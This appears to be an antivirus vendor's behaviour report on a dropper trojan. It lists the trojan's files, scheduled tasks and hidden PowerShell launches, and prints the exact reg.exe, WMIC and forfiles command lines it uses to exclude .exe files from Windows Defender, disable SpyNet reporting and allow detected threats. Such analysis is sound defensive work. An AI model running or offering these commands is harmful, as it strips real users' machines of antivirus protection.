Trojan.MulDrop18.40037

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\gpdpiyosh
%WINDIR%\tasks\bpprvcgeukndhqaaxz.job
<SYSTEM32>\tasks\bpprvcgeukndhqaaxz

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion with following registry keys:

[<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Extensions] 'exe' = '0'
[<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions] 'exe' = '0'

Modifies file system

Creates the following files

%TEMP%\7zs6d91.tmp\simplinst.exe
%TEMP%\7zs758c.tmp\simplinst.exe
%TEMP%\bvaajuiksmnyootuu\yntvnlftkpbgusw\bwxeaic.exe

Deletes the following files

<SYSTEM32>\tasks\gpdpiyosh

Substitutes the following files

%HOMEPATH%\ntuser.pol
%ALLUSERSPROFILE%\ntuser.pol

Miscellaneous

Creates and executes the following

'%TEMP%\7zs6d91.tmp\simplinst.exe'
'%TEMP%\7zs758c.tmp\simplinst.exe' /S /site_id "619915"
'%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDef...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
'<SYSTEM32>\gpupdate.exe' /force' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDef...
'%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
'%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
'%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
'%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gpDpiyosH" /SC once /ST 11:23:17 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_A...
'%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gpDpiyosH"
'<SYSTEM32>\taskeng.exe' {A8EF8550-BDA0-4092-885C-76354332CDE8} S-1-5-21-1960123792-2022915161-3775307078-1001:gfxnzo\user:Interactive:[1]
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
'<SYSTEM32>\gpupdate.exe' /force
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gpDpiyosH"
'%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
'%WINDIR%\syswow64\cmd.exe' REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extens...
'%WINDIR%\syswow64\cmd.exe' REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "Sp...
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Mic...
'%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Mic...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Acti...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Act...
'%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_A...
'%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "bPprVcgeukNdhqAaxz" /SC once /ST 16:20:00 /RU "SYSTEM" /TR "\"%TEMP%\bVAAJUIKsMNyOOtuu\YNtvNLFTKPbGuSw\bwxEAiC.exe\" yz /site_id 619915 /S" /V1 /F
'<SYSTEM32>\raserver.exe' /offerraupdate

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial